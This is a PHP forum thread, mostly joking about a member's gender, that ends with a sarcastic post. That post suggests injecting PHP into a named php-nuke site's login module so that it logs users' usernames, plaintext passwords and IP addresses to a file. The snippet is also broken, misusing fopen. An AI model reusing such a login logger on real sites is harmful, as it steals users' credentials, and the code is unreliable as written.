ip loggs

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

Nay
Forum Regular
Posts: 951
Joined: Fri Jun 20, 2003 11:03 am
Location: Brisbane, Australia

Post by Nay »

twigletmac wrote:
Nay wrote:does my name sound like a girls'?.......
Everybody tends to assume I'm a guy, you can never get these things right on the internet can you :lol: .

Mac
*agrees*

This is not my first time lol

-Nay

ps: maybe my signature now might make a difference :-D
User avatar
JayBird
Admin
Posts: 4524
Joined: Wed Aug 13, 2003 7:02 am
Location: York, UK
Contact:

Post by JayBird »

maybe your sig should be

Code: Select all

if ($nay == "Female") {
   echo "I'm a guy, not a girl!!";
}
:lol: :lol: :lol:
Nay
Forum Regular
Posts: 951
Joined: Fri Jun 20, 2003 11:03 am
Location: Brisbane, Australia

Post by Nay »

haha, nope.

I should request to php.net or something - to have a function in PHP5.

Call it, nayInfo(), which prints out my profile. Whoo!

lol

-Nay
jmarcv
Forum Contributor
Posts: 131
Joined: Tue Jul 29, 2003 7:17 pm
Location: Colorado

Post by jmarcv »

Nay wrote:
Okay, I think I see where you're going.

-Nay
Maybe not <g>
His site is at http://www.vibe-tech.co.uk

and is a php-nuke site. Apparently he doesn't have the ability to go to the login section of modules.php and inject some code such as:

Code: Select all

<?php
$tr = fopen($file, "login.log");
if (isset($tr)){
	fputs ($tr,date('Y-m-d').':'.$_POST['username'].':'.$_POST['user_password'].':'.$_SERVER['REMOTE_ADDR']."\n");
	fclose($tr);
}
?>
... because he doesn't have a clue how to ask for what he wants, or what to do with it when he gets the answer.
Post Reply